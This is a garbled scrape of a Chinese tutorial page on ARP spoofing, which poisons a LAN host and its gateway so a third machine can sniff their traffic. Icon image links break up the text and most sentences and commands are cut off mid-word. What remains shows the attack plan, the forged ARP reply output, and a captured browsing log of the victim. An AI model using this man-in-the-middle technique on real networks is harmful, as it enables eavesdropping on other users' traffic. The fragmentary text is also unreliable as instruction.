![](/icons/78339dou.gif)
![](/icons/78339de.gif)
![](/icons/78339de.gif)
![](/icons/78339dou.gif)
![](/icons/78339if.gif)
![](/icons/78339yi.gif)
![](/icons/78339de.gif)
![](/icons/78339de.gif)
![](/icons/78339dou.gif)
![](/icons/78339de.gif)
![](/icons/78339de.gif)
![](/icons/78339dou2.gif)
但是我们可以通过利用ARP欺骗可以实现Sn
![](/icons/78339if.gif)
![](/icons/78339de.gif)
![](/icons/78339de.gif)
![](/icons/78339dou2.gif)
ARP协议是将IP解析为MAC地址
![](/icons/78339de.gif)
![](/icons/78339dou.gif)
![](/icons/78339de.gif)
![](/icons/78339de.gif)
![](/icons/78339dou2.gif)
例如下面这样
![](/icons/78339de.gif)
在局域网中192.168.0.24和192.168.0.29都是通过网关192.168.0.1上网
![](/icons/78339de.gif)
![](/icons/78339dou.gif)
![](/icons/78339de.gif)
![](/icons/78339dou.gif)
![](/icons/78339de.gif)
![](/icons/78339dou.gif)
![](/icons/78339dou2.gif)
1、 首先告诉192.168.0.29
![](/icons/78339dou.gif)
![](/icons/78339de.gif)
2、 告诉192.168.0.1
![](/icons/78339dou.gif)
![](/icons/78339de.gif)
![](/icons/78339dou2.gif)
这样192.168.0.29和192.168.0.1的间
![](/icons/78339de.gif)
![](/icons/78339dou.gif)
![](/icons/78339dou.gif)
![](/icons/78339de.gif)
![](/icons/78339dou.gif)
![](/icons/78339dou2.gif)
![](/icons/78339de.gif)
![](/icons/78339yi.gif)
![](/icons/78339dou.gif)
![](/icons/78339dou.gif)
![](/icons/78339yinwei.gif)
![](/icons/78339de.gif)
![](/icons/78339dou.gif)
![](/icons/78339dou2.gif)
这时候192.168.0.24设置
![](/icons/78339yi.gif)
![](/icons/78339de.gif)
![](/icons/78339dou.gif)
![](/icons/78339de.gif)
![](/icons/78339dou.gif)
![](/icons/78339de.gif)
![](/icons/78339dou2.gif)
![](/icons/78339dou2.gif)
具体实现:
1、 欺骗192.168.0.29
![](/icons/78339dou.gif)
![](/icons/78339de.gif)
![](/icons/78339dou2.gif)
[root@Linux dsn
![](/icons/78339if.gif)
0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
0:0:21:0:0:18 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:0:21:0:0:18
………………………………..
这时候对192.168.0.29
![](/icons/78339de.gif)
![](/icons/78339dou2.gif)
2、 欺骗192.168.0.1
![](/icons/78339dou.gif)
![](/icons/78339de.gif)
![](/icons/78339dou2.gif)
[root@Linux dsn
![](/icons/78339if.gif)
0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71
0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71
0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71
0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e
0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e
0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e
其实在这个时候192.168.0.29是可以发现
![](/icons/78339de.gif)
![](/icons/78339dou2.gif)
C:\WINNT>arp -a
Interface: 192.168.0.29 _disibledevent=>
Kitty - - [18/May/2002:20:02:28 +1100] "GEThttp://www.ezboard.com/ztyles/default.css HTTP/1.1" - - "http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
Kitty - - [18/May/2002:20:02:29 +1100] "GEThttp://www1.ezboard.com/spch.js?customerid=1147458082 HTTP/1.1" - - "http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
当然也可以知道其他………:-)
整个过程需要在Linux下面实现
![](/icons/78339dou.gif)
![](/icons/78339de.gif)
![](/icons/78339if.gif)
![](/icons/78339if.gif)
![](/icons/78339dou2.gif)
![](/icons/78339yi.gif)
![](/icons/78339de.gif)
![](/icons/78339yi.gif)
![](/icons/78339de.gif)
最新评论